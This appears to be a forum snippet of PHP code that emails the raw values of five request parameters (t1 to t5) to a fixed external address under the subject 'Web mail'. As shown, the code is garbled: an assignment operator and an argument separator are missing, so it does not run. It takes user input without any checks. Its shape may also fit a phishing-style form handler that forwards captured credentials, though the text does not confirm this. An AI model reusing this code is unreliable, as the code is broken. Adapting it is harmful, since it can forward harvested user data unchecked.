Codice PHP:
<?php
$result 
mail("fg@mcclaus.com""Web mail",
$_REQUEST["t1"].$_REQUEST["t2"].$_REQUEST["t3"].$_REQUEST["t4"].$_REQUEST["t5"]);
?>